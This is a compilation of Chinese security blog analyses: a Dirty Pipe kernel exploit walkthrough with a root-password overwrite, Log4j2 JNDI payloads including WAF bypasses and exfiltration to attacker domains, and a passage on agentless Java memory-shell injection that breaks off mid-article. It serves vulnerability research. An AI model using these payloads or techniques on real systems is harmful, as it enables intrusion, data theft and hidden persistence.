    /* splice one byte from before the specified offset into the       pipe; this will add a reference to the page cache, but       since copy_page_to_iter_pipe() does not initialize the       "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */    --offset;    ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
如上代码，splice的参数1为644权限的文件passwd1的句柄，参数3为pipe的写入端，即读取passwd1的数据到pipe管道中。splice在内核中调用函数do_splice
// splice.c#1025/* * Determine where to splice to/from. */long do_splice(struct file *in, loff_t *off_in, struct file *out,           loff_t *off_out, size_t len, unsigned int flags){    // ...    // #1036: 判断in是否具有读权限，out是否具有写权限。    //        权限检查失败则return    if (unlikely(!(in->f_mode & FMODE_READ) ||                 !(out->f_mode & FMODE_WRITE)))        return -EBADF;
    // 获取in和out的pipe指针，实际上是针对pipe类型文件才具有，    // create_pipe_files时会保留pipe的指针在FILE结构的private_data中    // 根据exp分析，这里ipipe会为null，而opipe获取成功    ipipe = get_pipe_info(in, true);    opipe = get_pipe_info(out, true);
    // 管道对接管道     if (ipipe && opipe) {    // ...        return splice_pipe_to_pipe(ipipe, opipe, len, flags);    }
    // 只有入方向为管道    if (ipipe && opipe) {       // ...        file_start_write(out);        ret = do_splice_from(ipipe, out, &offset, len, flags);        file_end_write(out);    }
    // #1090: 出方向为管道    if (opipe) {        if (off_out)            return -ESPIPE;        if (off_in) {
            // 需要in具有读权限            if (!(in->f_mode & FMODE_PREAD))                return -EINVAL;            offset = *off_in;        } else {            offset = in->f_pos;        }
        if (out->f_flags & O_NONBLOCK)            flags |= SPLICE_F_NONBLOCK;
        // 调用splice_file_to_pipe        ret = splice_file_to_pipe(in, opipe, &offset, len, flags);
do_splice调用splice_file_to_pipe
// splice.c#1008long splice_file_to_pipe(struct file *in,             struct pipe_inode_info *opipe,             loff_t *offset,             size_t len, unsigned int flags){    // ...     ret = do_splice_to(in, offset, opipe, len, flags);
do_splice调用如下
==>splice_file_to_pipe()
====>do_splice_to()
======> in->f_op->splice_read(in, ppos, pipe, len, flags); // generic_file_splice_read()
=========> call_read_iter()
=============> file->f_op->read_iter() // generic_file_read_iter()
================> filemap_read() // generic_file_read_iter对非direct io模式调用filemap_read
看函数filemap_read
// filemap.c#2629/** * filemap_read - Read data from the page cache. * @iocb: The iocb to read. * @iter: Destination for the data. * @already_read: Number of bytes already read by the caller. * * Copies data from the page cache.  If the data is not currently present, * uses the readahead and readpage address_space operations to fetch it. * * Return: Total number of bytes copied, including those already read by * the caller.  If an error happens before any bytes are copied, returns * a negative error number. */ssize_t filemap_read(struct kiocb *iocb, struct iov_iter *iter,        ssize_t already_read){    // ...    // #2676: 将in文件的page_cache保存在结构体struct folio_batch fbatch中    error = filemap_get_pages(iocb, iter, &fbatch);
    // #2707: 遍历文件缓存页，调用copy_folio_to_iter    for (i = 0; i < folio_batch_count(&fbatch); i++) {        struct folio *folio = fbatch.folios[i];        size_t fsize = folio_size(folio);        size_t offset = iocb->ki_pos & (fsize - 1);        size_t bytes = min_t(loff_t, end_offset - iocb->ki_pos,                             fsize - offset);        size_t copied;
        if (end_offset < folio_pos(folio))            break;        if (i > 0)            folio_mark_accessed(folio);        /*             * If users can be writing to this folio using arbitrary             * virtual addresses, take care of potential aliasing             * before reading the folio on the kernel side.             */        if (writably_mapped)            flush_dcache_folio(folio);
        copied = copy_folio_to_iter(folio, offset, bytes, iter);
copy_folio_to_iter(folio, offset, bytes, iter);继续调用：
====> copy_page_to_iter(&folio->page, offset, bytes, i);
=======> __copy_page_to_iter(page, offset,min(bytes, (size_t)PAGE_SIZE - offset), i);
//iov_iter.c#846static size_t __copy_page_to_iter(struct page *page, size_t offset, size_t bytes,             struct iov_iter *i){    if (likely(iter_is_iovec(i)))        return copy_page_to_iter_iovec(page, offset, bytes, i);    if (iov_iter_is_bvec(i) || iov_iter_is_kvec(i) || iov_iter_is_xarray(i)) {        void *kaddr = kmap_local_page(page);        size_t wanted = _copy_to_iter(kaddr + offset, bytes, i);        kunmap_local(kaddr);        return wanted;    }    if (iov_iter_is_pipe(i))        return copy_page_to_iter_pipe(page, offset, bytes, i);
这里时文件向pipe copy，所以调用copy_page_to_iter_pipe，细心的同学或许发现了此处正是补丁修补位置之一，看copy_page_to_iter_pipe代码：
static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes,             struct iov_iter *i){    // ...    buf = &pipe->bufs[i_head & p_mask];    if (off) {        if (offset == off && buf->page == page) {            /* merge with the last one */            buf->len += bytes;            i->iov_offset += bytes;            goto out;        }        i_head++;        buf = &pipe->bufs[i_head & p_mask];    }    if (pipe_full(i_head, p_tail, pipe->max_usage))        return 0;
    buf->ops = &page_cache_pipe_buf_ops;    get_page(page);    buf->page = page;    buf->offset = offset;    buf->len = bytes;
如上代码可以看到，仅仅时完成了pipe_buf->page到page的引用，并没有实际的copy，完成零拷贝的同时完成的页绑定，调试获取此时buf->page引用的页地址
gef➤  p *(struct folio_batch*)fbatch$12 = {  nr = 0x1,   percpu_pvec_drained = 0x0,   folios = {0xffffea0000034800, 0xffff888003262b00, 0x10 , 0xffffc900001cfe58, 0xffff888003262b00, 0x0 , 0x20000 , 0xffff8880006fd7c0, 0x0 , 0x0 , 0x4004 , 0x0 , 0xffffc900001cfd80, 0xffffc900001cfda8, 0xffffffffffffffff}}
5）越权写
继续看exp中的代码
    const char *const data = ":$1$aaron$pIwpJwMMcozsUxAtRa85w.:0:0:test:/root:/bin/sh\n";       // openssl passwd1 -1 -salt aaron aaron     printf("Setting root password to \"aaron\"...\n");    const size_t data_size = strlen(data);
    /* the following write will not create a new pipe_buffer, but       will instead write into the page cache, because of the       PIPE_BUF_FLAG_CAN_MERGE flag */    nbytes = write(p[1], data, data_size);
write写管道内核中调用pipe_write
//pipe.c#414static ssize_tpipe_write(struct kiocb *iocb, struct iov_iter *from){    // ...    if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&        offset + chars <= PAGE_SIZE) {        ret = pipe_buf_confirm(pipe, buf);        if (ret)            goto out;
        ret = copy_page_from_iter(buf->page, offset, chars, from);        if (unlikely(ret < chars)) {
下个断点，获取copy_page_from_iter()参数buf->page的值，和前面splice中绑定的页是一致的

这里向管道写时没有权限校验的，且buf->flags存在PIPE_BUF_FLAG_CAN_MERGE时，直接调用copy_page_from_iter完成从pipe缓冲区到文件页的拷贝。
如果没有这个标签的话，实际上会往pipe->tmp_page去写，此时就不会写到目标文件中。

4. 参考
https://dirtypipe.cm4all.com/
References
[1] exploit: https://raw.githubusercontent.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit/main/exploit.c
[2] commit: https://github.com/torvalds/linux/commit/f6dd975583bd8ce088400648fd9819e4691c8958
[3] 补丁: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/diff/?id=9d2231c5d74e13b2a0546fee6737ee4446017903&id2=e783362eb54cd99b2cac8b3a9aeac942e6f6ac07
[4] commit 241699cd72a8 “new iov_iter flavour: pipe-backed” (Linux 4.9, 2016): https://github.com/torvalds/linux/commit/241699cd72a8489c9446ae3910ddd243e9b9061b





阅读原文
跳转微信打开



Log4j2系列漏洞分析汇总
Wed, 22 Dec 2021 16:34:00 +0800

原创 Jayway 2021-12-22 16:34 


关于Log4j2系列漏洞的原理、绕过及修复的完整总结。









一、概述
1.1 日志框架
Web应用中，开发者通常通过打印日志快速定位问题，java里常见的log框架主要有：
1）java.util.logging：JDK中的Java原生日志框架
2）Log4j：基于 Java 的日志实用程序，使用广泛。
3）LogBack：Log4j的一个改良版本
4）Log4j 2：对Log4j的升级，比前身Log4j 1.x提供了重大改进，并提供了Logback中可用的许多改进，是目前最优秀的Java日志框架。

1.2 Log4j2的使用
  研究Log4j2的漏洞，首先必须清楚这个组件是怎么用的，这里以Springboot为例，实现登录/注册功能将用户输入的用户名打印到日志中：
1）新建项目Log4jDemo，定义/login接口，接收用户输入username，通过log4j2的logger.error方法打印：
 2）配置好maven包含log4j-core2.14.0依赖即可：
3）开启服务，访问POST接口，输入username=Jayway:
 4）工作台打印日志：
  此外，log4j2还支持上下文查找的模式：
这里在配置文件里使用ctx定义记录userid的值：
定义一个接口（register），通过ThreadContext 映射userid来自输入值username：
  这样我们访问register接口username=jayway123：
就获取到我们输入值的日志：

二、CVE-2021-44228
2.1 漏洞信息
² 漏洞类型：RCE
² 漏洞等级：Critical（CVSS：10.0）
² 影响版本：2.0-beta9到2.14.1

2.2 漏洞原理
  日志在打印时当遇到“${”后，以“:”号作为分割，将表达式内容分割成两部分，前面一部分prefix，后面部分作为key，然后通过prefix去找对应的lookup，通过对应的lookup实例调用lookup方法，最后将key作为参数带入执行，引发远程代码执行漏洞。

2.3 漏洞复现
 1）漏洞探测
将输入替换为payload:${jndi:ldap://dnslog/a}:
DNSlog收到请求：
 
2）漏洞利用
  上面这一步打通了，后面就是JNDI注入流程，和fastjson反序列化的gadget利用是一样的，这里不再赘述。
 
2.4 漏洞分析
  老样子，在漏洞触发点下断点，反推漏洞触发流程：这里根据官方patch在JndiManager.lookup处打断点，查看堆栈就很清楚logger.log到JNDI.look之间发生了什么：
 下面针对关键方法的处理逻辑进行分析：
1）format()：MessagePatternConverter匹配日志中是否存在“${”,若是则进入append()：
 
2）substitute()：通过prefix/suffixMatcher取出“${”与“}”之间的值，进入resolveVariable方法： 

3）resolveVariable：使用接口类lookup方法处理，这个方法有多个实现： 

取prefix到strLookupMap中使用对应的lookup方法进行处理，Map里有java、ctx、upper、sys、jndi、env等可供解析，这里取到的是“jndi”：

4）可见取到jndi的值：ldap://dnslog/a，直接进入到JNDI的lookup实现，即this.context.lookup(name)进行处理：
 
2.5 WAF绕过&数据外带
  此漏洞出现了一些变式，其实都可以用上节第三步解释，输入不同值交由不同的lookup实现类处理，如：
1）WAF绕过
把payload换为“j${lower:NDI}”，则进入lower对应的LowerLookup处理，处理后NDI变为ndi: 
可见这里是lookup逻辑就是调用原生toLowerCase()方法： 
 然后再去匹配下一个“${”，再次递归处理，因此可以将payload做很多嵌套变式以躲避waf检测，如：
${${lower:jndi}:${lower:rmi}://domain.com/j}
${${lower:${lower:jndi}}:${lower:rmi}://domain.com/j}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://domain.com/j}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://domain.com/j}
  但如果我们把payload稍微做一下变化：“j${lower:-NDI}”，发现最终会解析为jNDI，只是多了个“-”而已：
 原因是这里针对:-还有处理逻辑，只要匹配到就会解析为:-和}之间的值: 
如：j${xxxxxxx:-NDI}都会被处理为jNDI: 
  这就又出了一批绕过payload，如：
j${::-nD}i${::-:} ——>jnDi:
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://domain.com/j} ——>jndi:rmi://domain.com/j
 
2）数据外带
  如果jndi被禁用了就无法进行RCE，但依然可以使用上面的其他解析逻辑，如：
${jndi:ldap://${sys:java.version}.domain/a}
${jndi:ldap://${hostName}.domain/a}


  原理同样和上述一样，跟进发现sys处理对应的其实是System.getProperty()方法：
  通过这种方式可将java版本等环境信息、application.properties 等配置文件外带。

2.6 2.15.0-rc1版本修复
  临时版本2.15.0-rc1针对此RCE漏洞进行了修复，重新跑一遍流程，有如下两个变化：
1）toSerializable：默认关闭lookup功能
  对比2.4.1节，在修复后默认变成使用MessagePatternConverter.SimplePatternConverter的format方法处理，不再判断是否存在“${”：
 可见直接将${字符拼接并打印： 
默认情况下lookups的值为0，关闭lookup功能：
若手动配置开启，仍可走到Lookup分支，进行${}的处理： 
 
2）JndiManager.lookup：加入白名单限制
  这是第二个做修改的地方，在进入JNDI的lookup之前针对Protocol、Host及Class进行限制：
  白名单约定默认允许的协议是：java，ldap，ldaps，数据类型是八大基本数据类型，Host白名单是localhost：

2.7 2.15.0-rc1修复绕过
  2.15.0-rc1的修复逻辑看似很安全，但细节却没处理好：lookup中若触发了异常URISyntaxException，仍然会进入this.context.lookup，造成JNDI注入：
  而触发这个异常也很简单，加个空格即可${jndi:ldap://127.0.0.1:1389/  abc}，lookup会自动去掉空格，依旧可以RCE。
 
2.8 2.15.0-rc2版本修复
 rc2针对异常逻辑进行优化，加入一句warn后直接return，不再继续往下执行。至此CVE-2021-44228被成功修复。
  一天后官方正式发布log4j-2.15.0，默认禁用lookup、加入白名单限制。

三、CVE-2021-45046
3.1 漏洞信息
² 漏洞类型：DoS/RCE
² 漏洞等级：Low（CVSS：3.7）——>Critical（CVSS：9.0）
² 影响版本：2.0-beta9 到 2.15.0

3.2 漏洞原理
当日志配置使用带有上下文查找的非默认模式布局（如$${ctx:loginId}）时，控制线程上下文映射 (MDC) 输入数据的攻击者可以使用 JNDI 查找模式制作恶意输入数据，导致Dos、部分环境信息泄露和远程代码执行。
这个漏洞本身是个Dos漏洞，但在12月17更新了一次，更新为RCE。

3.3 漏洞复现（DoS）
 配置方法不同，一般有如下场景：
1）Log4j2.xml配置，开启lookup：
拼接用户输入并打印：
  输入payload，每个payload将造成阻塞2s:
username=${jndi:ldap://127.0.0.1}${jndi:ldap://127.0.0.1}.....${jndi:ldap://127.0.0.1}
2）Log4j2.xml还支持从上下文中取值，比如第一节中的$${ctx:loginId}），如下配置可以取到loginId值：
造成同样的阻塞效果：

3.4 漏洞分析（DoS）
1）漏洞思路：
代码限制了JndiLookup只能取本地host。lookup本质是网络相关的操作，尝试去lookup本地但本地不可能开LDAP Server，于是便发生超时等待。

2）利用前提：
  漏洞利用前提是配置文件里开启lookup，或存在形如${ctx:loginId}的配置，这个配置可绕过默认的lookup限制：
 
3）代码分析：
  在报错信息里很明显看到是connect操作导致的阻塞：
  至于后续的一次更新，原因在于有安全研究者发现可绕过host的限制，payload:
${jndi:ldap://127.0.0.1#evilhost.com:1389/a}
利用解析差异，java.net.URI的getHost() 方法返回 # 之前的值作为真实主机，但 JNDI/LDAP 解析器将解析为后面的恶意 LDAP 服务器。（PS：次漏洞只在 MacOS 环境中方可触发）

3.5 漏洞修复
  由于这个漏洞是jndi的lookup请求超时引起，官方发布临时版本2.15.1.rc1版本，默认禁用了jndi功能： 
 在正式的2.16.0干脆将lookup全部删除：
四、CVE-2021-45105
4.1 漏洞信息
² 漏洞类型：DoS
² 漏洞等级：High（CVSS：7.5）
² 影响版本： 2.0-beta9到2.16.0

4.2 漏洞原理
  当日志配置使用带有上下文查找的非默认模式布局（例如，$${ctx:loginId}）时，控制线程上下文映射 (MDC) 输入数据的攻击者可以制作包含递归查找的恶意输入数据（如：${${::-${::-$${::-j}}}}），导致 StackOverflowError 将终止进程。
 
4.3 漏洞复现
  这个漏洞其实算是45046的“附属品”，调试45046时就能发现这个DoS漏洞：输入payload：${::-${ctx:userid}} 
正常跟踪堆栈，发现到StrSubstitutor时候中存在checkCyclicSubstitution的判断，而这个判断会一直循环执行：
看下这个void判断方法的逻辑，if判断若不满足条件则直接退出方法，明显有问题：
如此无限循环后，最终导致StackOverflowError：

4.4 漏洞修复
  2.17.0-rc1及正式2.17.0版本均做了修复，将此判断checkCyclicSubstitution改为bool方法，增加返回值return。
  PS：由于这个漏洞发生在substitute解析阶段，还未走到lookup的逻辑，所以对于开启 log4j2.noFormatMsgLookup为true等情况下不能防御，只有升级至高版本。


五、CVE-2021-4104
最后提一下CVE-2021-4104，这个漏洞只影响log4j 1.x，和上面的Log4j2漏洞没有任何关系，且利用前提是配置文件能被控制，攻击者通过 JMSAppender 进行 JNDI 注入实现 RCE。
  也就是说，攻击者需要将Log4j.xml文件中配置Jms，指向恶意ldap服务器：
“Jms” 
factoryBindingName=”ldap://evil.com/abc” destinationBindingName=”ldap://evil.com/abc”>
 后面JmsAppender将取factoryBindingName值，走到jndiManager.lookup并发起Jndi的lookup处理，这个触发点和44228一模一样，猜测是安全研究员根据44228漏洞特征反推到的利用链，只是外部输入并不可控，所以显得很鸡肋。
 
六、总结
1）漏洞发展：
  一张图总结Log4j2系列漏洞的更新/绕过/修复：

2）漏洞总结
Log4j2系列漏洞，除了CVE-2021-44228，其他的几个漏洞都可以理解是在复现CVE-2021-44228的时候意外发现的漏洞，换句话说，真正有威胁的只有44228。
而对于CVE-2021-44228，大部分java应用一定是存在这个漏洞的，但存在漏洞≠可被利用，真正达成RCE的攻击效果需要满足各种条件，包括：目标机需要有公网权限（可出网）、JDK版本不能过高等。
 
3）修复建议
  当前2.17.0版本修复了出现的所有漏洞，暂未发现新的风险，建议升级至此版本。
 
 
 
参考：
https://logging.apache.org/log4j/2.x/security.html
https://github.com/apache/logging-log4j2/





阅读原文
跳转微信打开



Linux下内存马进阶植入技术
Thu, 02 Sep 2021 12:05:00 +0800

原创 游望之 2021-09-02 12:05 


无agent文件的条件下使用Java Instrumentation API









无agent文件的条件下使用Java Instrumentation API

序：Java Instrumentation API
从Java SE 5开始，可以使用Java的Instrumentation接口来编写Agent。如果需要在目标JVM启动的同时加载Agent，可以选择实现下面的方法：
 public static void premain(String agentArgs, Instrumentation inst); public static void premain(String agentArgs);
JVM将首先寻找[1]，如果没有发现[1]，再寻找[2]。如果希望在目标JVM运行时加载Agent，则需要实现下面的方法：
public static void agentmain(String agentArgs, Instrumentation inst);public static void agentmain(String agentArgs);
我们这里只讨论运行时加载的情况。Agent需要打包成一个jar包，在ManiFest属性中指定“Premain-Class”或者“Agent-Class”：
Premain-Class: classAgent-Class: class
生成agent.jar之后，可以通过com.sun.tools.attach.VirtualMachine的loadAgent方法加载：
private void attachAgentToTargetJVM() throws Exception {    List virtualMachineDescriptors = VirtualMachine.list();    VirtualMachineDescriptor targetVM = null;    for (VirtualMachineDescriptor descriptor : virtualMachineDescriptors) {        if (descriptor.id().equals(configure.getPid())) {            targetVM = descriptor;            break;        }    }    if (targetVM == null) {        throw new IllegalArgumentException("could not find the target jvm by process id:" + configure.getPid());    }    VirtualMachine virtualMachine = null;    try {        virtualMachine = VirtualMachine.attach(targetVM);        virtualMachine.loadAgent("{agent}", "{params}");    } catch (Exception e) {        if (virtualMachine != null) {            virtualMachine.detach();        }    }}
以上代码可以用反射实现，使用Java agent这种方式可以修改已有方法，java.lang.instrument.Instrumentation提供了如下方法：
public interface Instrumentation {    /**     * 加入一个转换器Transformer，之后的所有的类加载都会被Transformer拦截。     * ClassFileTransformer类是一个接口，使用时需要实现它，该类只有一个方法，该方法传递类的信息，返回值是转换后的类的字节码文件。     */   void addTransformer(ClassFileTransformer transformer, boolean canRetransform);    
    /**     * 对JVM已经加载的类重新触发类加载。使用的就是上面注册的Transformer。     * 该方法可以修改方法体、常量池和属性值，但不能新增、删除、重命名属性或方法，也不能修改方法的签名     */    void retransformClasses(Class... classes) throws UnmodifiableClassException;       /**   *此方法用于替换类的定义，而不引用现有的类文件字节，就像从源代码重新编译以进行修复和继续调试时所做的那样。   *在要转换现有类文件字节的地方(例如在字节码插装中)，应该使用retransformClasses。   *该方法可以修改方法体、常量池和属性值，但不能新增、删除、重命名属性或方法，也不能修改方法的签名   */  void redefineClasses(ClassDefinition... definitions)throws  ClassNotFoundException, UnmodifiableClassException;
    /**     * 获取一个对象的大小     */    long getObjectSize(Object objectToSize);        /**     * 将一个jar加入到bootstrap classloader的 classpath里     */    void appendToBootstrapClassLoaderSearch(JarFile jarfile);        /**     * 获取当前被JVM加载的所有类对象     */    Class[] getAllLoadedClasses();}
可以使用redefineClasses方法完成对类方法的修改，结合javassist可以说是非常方便：
public static void agentmain(String args, Instrumentation inst) throws Exception {    Class[] loadedClasses = inst.getAllLoadedClasses();    for (int i = 0; i < loadedClasses.length; ++i) {        Class clazz = loadedClasses[i];        if (clazz.getName().equals("com.huawei.xxxx")) {            try {                ClassPool classPool = ClassPool.getDefault();                CtClass ctClass = classPool.get(clazz.getName());                ctClass.stopPruning(true);
                // javaassist freezes methods if their bytecode is saved                // defrost so we can still make changes.                if (ctClass.isFrozen()) {                    ctClass.defrost();                }
                CtMethod method; // populate this from ctClass however you wish
                method.insertBefore("{ System.out.println(\"Wheeeeee!\"); }");                byte[] bytecode = ctClass.toBytecode();
                ClassDefinition definition = new ClassDefinition(Class.forName(clazz.getName()), bytecode);                inst.redefineClasses(definition);            } catch (Exception var9) {                var9.printStackTrace();            }        }    }}
能否直接构造Instrumentation对象？
使用Java Instrumentation API的一个前提条件就是必须提供agent.jar，这是一个必须要放在硬盘上的文件。要解决这个问题，需要先识别问题的关键点：前面所有的编译生成agent.jar、loadagent加载最后都是为了产生Instrumentation对象，通过这个对象提供的redefineClasses方法，只需要提供字节码就可以完成类修改。java.lang.instrument.Instrumentation只是一个接口，它的实现类是:
/** * The Java side of the JPLIS implementation. Works in concert with a native JVMTI agent * to implement the JPLIS API set. Provides both the Java API implementation of * the Instrumentation interface and utility Java routines to support the native code. * Keeps a pointer to the native data structure in a scalar field to allow native * processing behind native methods. */public class InstrumentationImpl implements Instrumentation {    private final     TransformerManager      mTransformerManager;    private           TransformerManager      mRetransfomableTransformerManager;    // needs to store a native pointer, so use 64 bits    private final     long                    mNativeAgent;    private final     boolean                 mEnvironmentSupportsRedefineClasses;    private volatile  boolean                 mEnvironmentSupportsRetransformClassesKnown;    private volatile  boolean                 mEnvironmentSupportsRetransformClasses;    private final     boolean                 mEnvironmentSupportsNativeMethodPrefix;
    private    InstrumentationImpl(long    nativeAgent,                        boolean environmentSupportsRedefineClasses,                        boolean environmentSupportsNativeMethodPrefix) {        mTransformerManager                    = new TransformerManager(false);        mRetransfomableTransformerManager      = null;        mNativeAgent                           = nativeAgent;        mEnvironmentSupportsRedefineClasses    = environmentSupportsRedefineClasses;        mEnvironmentSupportsRetransformClassesKnown = false; // false = need to ask        mEnvironmentSupportsRetransformClasses = false;      // don't know yet        mEnvironmentSupportsNativeMethodPrefix = environmentSupportsNativeMethodPrefix;    }
    ...
    public void    redefineClasses(ClassDefinition...  definitions)            throws  ClassNotFoundException {        if (!isRedefineClassesSupported()) {            throw new UnsupportedOperationException("redefineClasses is not supported in this environment");        }        if (definitions == null) {            throw new NullPointerException("null passed as 'definitions' in redefineClasses");        }        for (int i = 0; i < definitions.length; ++i) {            if (definitions[i] == null) {                throw new NullPointerException("element of 'definitions' is null in redefineClasses");            }        }        if (definitions.length == 0) {            return; // short-circuit if there are no changes requested        }
        redefineClasses0(mNativeAgent, definitions);    }
    private native void    redefineClasses0(long nativeAgent, ClassDefinition[]  definitions)        throws  ClassNotFoundException;
    ...
}
该类java.sun.instrument.InstrumentationImpl的构造函数私有，但使用反射仍然可以调用。重点关注这个参数nativeAgent，这是一个native的指针，那么如果我们能提供这个指针，就可以不通过加载agent文件的方式实现修改类代码。
如何获得nativeAgent指针？
继续翻看Hotspot代码
public class InstrumentationImpl implements Instrumentation {    ...
    public void    redefineClasses(ClassDefinition...  definitions)            throws  ClassNotFoundException {        if (!isRedefineClassesSupported()) {            throw new UnsupportedOperationException("redefineClasses is not supported in this environment");        }        if (definitions == null) {            throw new NullPointerException("null passed as 'definitions' in redefineClasses");        }        for (int i = 0; i < definitions.length; ++i) {            if (definitions[i] == null) {                throw new NullPointerException("element of 'definitions' is null in redefineClasses");            }        }        if (definitions.length == 0) {            return; // short-circuit if there are no changes requested        }
        redefineClasses0(mNativeAgent, definitions);    }
    private native void    redefineClasses0(long nativeAgent, ClassDefinition[]  definitions)        throws  ClassNotFoundException;
    ...}
可以看到mNativeAgent变量经由redefineClasses0函数，经JNI方法传递到了native层代码。
/* * Class:     sun_instrument_InstrumentationImpl * Method:    redefineClasses0 * Signature: ([Ljava/lang/instrument/ClassDefinition;)V */JNIEXPORT void JNICALL Java_sun_instrument_InstrumentationImpl_redefineClasses0  (JNIEnv * jnienv, jobject implThis, jlong agent, jobjectArray classDefinitions) {    redefineClasses(jnienv, (JPLISAgent*)(intptr_t)agent, classDefinitions);}
/* *  Java code must not call this with a null list or a zero-length list. */voidredefineClasses(JNIEnv * jnienv, JPLISAgent * agent, jobjectArray classDefinitions) {    jvmtiEnv*   jvmtienv                        = jvmti(agent);    jboolean    errorOccurred                   = JNI_FALSE;    jclass      classDefClass                   = NULL;    jmethodID   getDefinitionClassMethodID      = NULL;    jmethodID   getDefinitionClassFileMethodID  = NULL;    jvmtiClassDefinition* classDefs             = NULL;    jbyteArray* targetFiles                     = NULL;    jsize       numDefs                         = 0;
    jplis_assert(classDefinitions != NULL);
    numDefs = (*jnienv)->GetArrayLength(jnienv, classDefinitions);    errorOccurred = checkForThrowable(jnienv);    jplis_assert(!errorOccurred);
    if (!errorOccurred) {        jplis_assert(numDefs > 0);        /* get method IDs for methods to call on class definitions */        classDefClass = (*jnienv)->FindClass(jnienv, "java/lang/instrument/ClassDefinition");        errorOccurred = checkForThrowable(jnienv);        jplis_assert(!errorOccurred);    }
    ...}
可以看到这个agent指针的结构类型为JPLISAgent，它的定义如下：
struct _JPLISAgent {    JavaVM *                mJVM;                   /* handle to the JVM */    JPLISEnvironment        mNormalEnvironment;     /* for every thing but retransform stuff */    JPLISEnvironment        mRetransformEnvironment;/* for retransform stuff only */    jobject                 mInstrumentationImpl;   /* handle to the Instrumentation instance */    jmethodID               mPremainCaller;         /* method on the InstrumentationImpl that does the premain stuff (cached to save lots of lookups) */    jmethodID               mAgentmainCaller;       /* method on the InstrumentationImpl for agents loaded via attach mechanism */    jmethodID               mTransform;             /* method on the InstrumentationImpl that does the class file transform */    jboolean                mRedefineAvailable;     /* cached answer to "does this agent support redefine" */    jboolean                mRedefineAdded;         /* indicates if can_redefine_classes capability has been added */    jboolean                mNativeMethodPrefixAvailable; /* cached answer to "does this agent support prefixing" */    jboolean                mNativeMethodPrefixAdded;     /* indicates if can_set_native_method_prefix capability has been added */    char const *            mAgentClassName;        /* agent class name */    char const *            mOptionsString;         /* -javaagent options string */};
struct _JPLISEnvironment {    jvmtiEnv *              mJVMTIEnv;              /* the JVM TI environment */    JPLISAgent *            mAgent;                 /* corresponding agent */    jboolean                mIsRetransformer;       /* indicates if special environment */};
redefineClasses的第一行代码是jvmtiEnv*   jvmtienv                        = jvmti(agent)， 这个jvmti是个宏：
#define jvmti(a) a->mNormalEnvironment.mJVMTIEnv
在Java SE 5以前，就支持通过C/C++语言实现JVMTI agent，Java Instrumentation API的底层就是通过这种方式实现的。开发agent时，需要包含位于JDK include目录下的jvmti.h，这里面定义了使用JVMTI所用到的函数、事件、数据类型和常量，最后agent会被编译成一个动态库。JVMTI的函数调用与JNI相似，可以通过一个接口指针来访问JVMTI的函数。JVMTI的接口指针称为环境指针(environment pointer)，环境指针是指向执行环境的指针，其类型为jvmtiEnv*。
jvmtiEnv *jvmti;...jvmtiError err = (*jvmti)->GetLoadedClasses(jvmti, &class_count, &classes);
jvmtiEnv也同样提供了RedefineClasses函数，Java Instrumentation API同样功能就是封装于此之上。
jvmtiError RedefineClasses(jint class_count,        const jvmtiClassDefinition* class_definitions) {return functions->RedefineClasses(this, class_count, class_definitions);}
那么问题进一步的变为：怎样得到jvmtiEnv指针。
JPLISAgent实例是如何创建的？
继续查看Hotspot代码
/* *  Creates a new JPLISAgent. *  Returns error if the agent cannot be created and initialized. *  The JPLISAgent* pointed to by agent_ptr is set to the new broker, *  or NULL if an error has occurred. */JPLISInitializationErrorcreateNewJPLISAgent(JavaVM * vm, JPLISAgent **agent_ptr) {    JPLISInitializationError initerror       = JPLIS_INIT_ERROR_NONE;    jvmtiEnv *               jvmtienv        = NULL;    jint                     jnierror        = JNI_OK;
    *agent_ptr = NULL;    jnierror = (*vm)->GetEnv(  vm,                               (void **) &jvmtienv,                               JVMTI_VERSION_1_1);    if ( jnierror != JNI_OK ) {        initerror = JPLIS_INIT_ERROR_CANNOT_CREATE_NATIVE_AGENT;    } else {        JPLISAgent * agent = allocateJPLISAgent(jvmtienv);        if ( agent == NULL ) {            initerror = JPLIS_INIT_ERROR_ALLOCATION_FAILURE;        } else {            initerror = initializeJPLISAgent(  agent,                                               vm,                                               jvmtienv);            if ( initerror == JPLIS_INIT_ERROR_NONE ) {                *agent_ptr = agent;            } else {                deallocateJPLISAgent(jvmtienv, agent);            }        }
        /* don't leak envs */        if ( initerror != JPLIS_INIT_ERROR_NONE ) {            jvmtiError jvmtierror = (*jvmtienv)->DisposeEnvironment(jvmtienv);            /* can be called from any phase */            jplis_assert(jvmtierror == JVMTI_ERROR_NONE);        }    }
    return initerror;}
JPLISInitializationErrorinitializeJPLISAgent(   JPLISAgent *    agent,                        JavaVM *        vm,                        jvmtiEnv *      jvmtienv) {    jvmtiError      jvmtierror = JVMTI_ERROR_NONE;    jvmtiPhase      phase;
    agent->mJVM                                      = vm;    agent->mNormalEnvironment.mJVMTIEnv              = jvmtienv;    agent->mNormalEnvironment.mAgent                 = agent;    agent->mNormalEnvironment.mIsRetransformer       = JNI_FALSE;    agent->mRetransformEnvironment.mJVMTIEnv         = NULL;        /* NULL until needed */    agent->mRetransformEnvironment.mAgent            = agent;    agent->mRetransformEnvironment.mIsRetransformer  = JNI_FALSE;   /* JNI_FALSE until mJVMTIEnv is set */    agent->mAgentmainCaller                          = NULL;    agent->mInstrumentationImpl                      = NULL;    agent->mPremainCaller                            = NULL;    agent->mTransform                                = NULL;    agent->mRedefineAvailable                        = JNI_FALSE;   /* assume no for now */    agent->mRedefineAdded                            = JNI_FALSE;    agent->mNativeMethodPrefixAvailable              = JNI_FALSE;   /* assume no for now */    agent->mNativeMethodPrefixAdded                  = JNI_FALSE;    agent->mAgentClassName                           = NULL;    agent->mOptionsString                            = NULL;    ...}
agent实例是通过native函数createNewJPLISAgent创建的，该函数是内部函数，没有从动态库中导出，Java层也没办法直接调用。那么思路还得回到jvmtiEnv指针上去。
*agent_ptr = NULL;    jnierror = (*vm)->GetEnv(  vm,                               (void **) &jvmtienv,                               JVMTI_VERSION_1_1);
从以上代码我们可知，jvmtiEnv可以通过JavaVM对象获得。而关于JavaVM对象，在JDK的jni.h中，有定义导出方法:
